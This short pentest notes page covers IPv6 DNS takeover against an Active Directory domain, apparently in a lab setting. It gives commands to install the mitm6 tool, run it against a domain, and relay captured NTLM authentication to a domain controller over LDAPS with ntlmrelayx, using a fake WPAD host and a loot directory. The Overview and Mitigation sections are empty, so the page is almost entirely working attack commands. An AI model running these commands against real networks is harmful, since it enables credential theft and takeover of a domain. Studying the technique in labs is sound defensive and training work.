IPv6 Attacks
Overview
Exploitation
Set Up mitm6
git clone https://github.com/fox-it/mitm6 /opt/mitm6
cd /opt/mitm6
pip3 install -r requirements.txt
python3 setup.py installIPv6 DNS Takeover via mitm6
# Run mitm6
mitm6 -d domain.local
# Set up relay against DC
ntlmrelayx.py -6 -t ldaps://192.168.31.10 -wh fakepad.marvel.local -l lootmeMitigation
Last updated